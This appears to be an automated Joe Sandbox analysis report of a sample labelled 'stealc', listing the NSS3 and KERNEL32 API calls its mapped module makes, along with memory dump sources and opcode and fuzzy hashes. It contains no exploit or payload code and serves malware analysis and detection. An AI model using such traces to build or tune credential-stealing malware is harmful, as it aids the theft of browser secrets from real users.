                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                              • Part of subcall function 6C8F1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C8EFAAB,00000000), ref: 6C8F157E
                                                                                                                                                                              • Part of subcall function 6C8F1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C8EFAAB,00000000), ref: 6C8F1592
                                                                                                                                                                              • Part of subcall function 6C8F1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C8F1600
                                                                                                                                                                              • Part of subcall function 6C8F1560: PL_ArenaRelease.NSS3(?,?), ref: 6C8F1620
                                                                                                                                                                              • Part of subcall function 6C8F1560: PR_Unlock.NSS3(?), ref: 6C8F1639
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3425318038-0
                                                                                                                                                                            • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                            • Instruction ID: cf82e3824ae93d6ea92608369532efba5d780a762b19634f362a7005e96b11eb
                                                                                                                                                                            • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                            • Instruction Fuzzy Hash: 6B41B7B4601506AFE750DF14D940B92B7A1FF45398F548528D8248BF91EB73E435CF90
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C8BDDEC
                                                                                                                                                                              • Part of subcall function 6C8F0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F08B4
                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6C8BDE70
                                                                                                                                                                            • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C8BDE83
                                                                                                                                                                            • HASH_ResultLenByOidTag.NSS3(?), ref: 6C8BDE95
                                                                                                                                                                            • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C8BDEAE
                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C8BDEBB
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8BDECC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1091488953-0
                                                                                                                                                                            • Opcode ID: 821f6a28145d684adf03f511d841fa0a25de197cb70631d9ce246a6900e8911f
                                                                                                                                                                            • Instruction ID: 5bff598164045ac1385522bd3ec3f9ad91f1dac4bb7ce56b48dd8796edda925d
                                                                                                                                                                            • Opcode Fuzzy Hash: 821f6a28145d684adf03f511d841fa0a25de197cb70631d9ce246a6900e8911f
                                                                                                                                                                            • Instruction Fuzzy Hash: DA31EBB29001147BDB20AE68AE41BBB76B8DF55608F050976FC09B7715F731D914C6E2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6C897E48
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C897E5B
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C897E7B
                                                                                                                                                                              • Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
                                                                                                                                                                              • Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C9B925C,?), ref: 6C897E92
                                                                                                                                                                              • Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095
                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C897EA1
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(00000004), ref: 6C897ED1
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(00000004), ref: 6C897EFA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3989529743-0
                                                                                                                                                                            • Opcode ID: dfc21fcf19dd4e76bec3f8be8f90416834501b1b7f139908de91713fc3e5fb32
                                                                                                                                                                            • Instruction ID: 8091716c9a4e936184c38ff15bb7d7ac6c390737acaf533ee8b384f58f088f33
                                                                                                                                                                            • Opcode Fuzzy Hash: dfc21fcf19dd4e76bec3f8be8f90416834501b1b7f139908de91713fc3e5fb32
                                                                                                                                                                            • Instruction Fuzzy Hash: 523184B2E012159BEB208B6D9E40B6B73A8AF45A58F154D34DD16EBB41F731EC04C7A0
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C8ED9E4,00000000), ref: 6C8EDC30
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C8ED9E4,00000000), ref: 6C8EDC4E
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C8ED9E4,00000000), ref: 6C8EDC5A
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C8EDC7E
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8EDCAD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2632744278-0
                                                                                                                                                                            • Opcode ID: eae29d3f1cea015e78f0388f51a6b3e166c8077847c96676db5faa4040e97418
                                                                                                                                                                            • Instruction ID: b202827332cd25cf5d7907c6fa830f7ea3bdd5f45a22d4cbcbcb423aab0b80f4
                                                                                                                                                                            • Opcode Fuzzy Hash: eae29d3f1cea015e78f0388f51a6b3e166c8077847c96676db5faa4040e97418
                                                                                                                                                                            • Instruction Fuzzy Hash: 6931A4B5504204DFD720CF1DD980B56B7F8AF9A398F15882AE95CCBB01D771E948CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C8AE728,?,00000038,?,?,00000000), ref: 6C8B2E52
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8B2E66
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8B2E7B
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6C8B2E8F
                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6C8B2E9E
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8B2EAB
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8B2F0D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3106257965-0
                                                                                                                                                                            • Opcode ID: 4b828f72a3853ad7aba81d722fb3e3556958178ab277357eca474aae7aba8b32
                                                                                                                                                                            • Instruction ID: 5c9d0782d889f5b67a385e29ac9b18361505fc7cccf0007f72a44725711064c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b828f72a3853ad7aba81d722fb3e3556958178ab277357eca474aae7aba8b32
                                                                                                                                                                            • Instruction Fuzzy Hash: AB313A75A00105ABEF106F68ED4487ABB74FF15258B148974EC1897B11E731EC64C7E0
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?,6C8FCD93,?), ref: 6C8FCEEE
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C8FCD93,?), ref: 6C8FCEFC
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C8FCD93,?), ref: 6C8FCF0B
                                                                                                                                                                              • Part of subcall function 6C8F0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F08B4
                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C8FCD93,?), ref: 6C8FCF1D
                                                                                                                                                                              • Part of subcall function 6C8EFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C8E8D2D,?,00000000,?), ref: 6C8EFB85
                                                                                                                                                                              • Part of subcall function 6C8EFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C8EFBB1
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF47
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF67
                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,6C8FCD93,?,?,?,?,?,?,?,?,?,?,?,6C8FCD93,?), ref: 6C8FCF78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4291907967-0
                                                                                                                                                                            • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                            • Instruction ID: 7153dce3d1beccb6578c1bd7573e96b0b05e89db80c6f8939bb3e03e5538e04b
                                                                                                                                                                            • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                            • Instruction Fuzzy Hash: E811DBB5E0020457F7306A6A7E41BA7B5DCDF9418DF004839EC29D7742FB61DA0986B1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8A8C1B
                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6C8A8C34
                                                                                                                                                                            • PL_ArenaAllocate.NSS3 ref: 6C8A8C65
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8A8C9C
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C8A8CB6
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                            • String ID: KRAM
                                                                                                                                                                            • API String ID: 4127063985-3815160215
                                                                                                                                                                            • Opcode ID: 92e58d3b44400ace60628841785edbdf5858a9f8a2f77af6166ca153b1d74744
                                                                                                                                                                            • Instruction ID: 05709475174f7ee08af7b52cb0288cc021f3f7c17a93018b959b5915a3b7be40
                                                                                                                                                                            • Opcode Fuzzy Hash: 92e58d3b44400ace60628841785edbdf5858a9f8a2f77af6166ca153b1d74744
                                                                                                                                                                            • Instruction Fuzzy Hash: 492180B16056019FD750AFB8C584569BBF4FF05304F168D6AD8888B701EB31D886CF91
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C925B40: PR_GetIdentitiesLayer.NSS3 ref: 6C925B56
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C923E45
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
                                                                                                                                                                              • Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
                                                                                                                                                                              • Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C923E5C
                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6C923E73
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C923EA6
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C923EC0
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C923ED7
                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6C923EEE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2517541793-0
                                                                                                                                                                            • Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                            • Instruction ID: 66c4f4481e6430b72dcf3c4d5104f20a38e0cbdb5f3425e2357db0d21579fd51
                                                                                                                                                                            • Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                            • Instruction Fuzzy Hash: F4118BB1520611ABE7319E39FC02BE777A5EB61318F404834E59987A24E73AE92DC742
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6C9A2CA0
                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6C9A2CBE
                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000014), ref: 6C9A2CD1
                                                                                                                                                                            • strdup.MOZGLUE(?), ref: 6C9A2CE1
                                                                                                                                                                            • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C9A2D27
                                                                                                                                                                            Strings
                                                                                                                                                                            • Loaded library %s (static lib), xrefs: 6C9A2D22
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                            • String ID: Loaded library %s (static lib)
                                                                                                                                                                            • API String ID: 3511436785-2186981405
                                                                                                                                                                            • Opcode ID: 91e3ec908d3a2df4c61cda4e3a9d3b3e7be5531c5a2c165f9ec6fcc6bad544c0
                                                                                                                                                                            • Instruction ID: 5a4778ee69390647c78e5b859d207234174638af011b8b39aa4819d1448670e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 91e3ec908d3a2df4c61cda4e3a9d3b3e7be5531c5a2c165f9ec6fcc6bad544c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 761138B1605650AFEB008F5AE808A6A77B8EB5630DF24843DD81DC7B41D731D809CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6C89BDCA
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
                                                                                                                                                                              • Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C89BDDB
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C89BDEC
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E
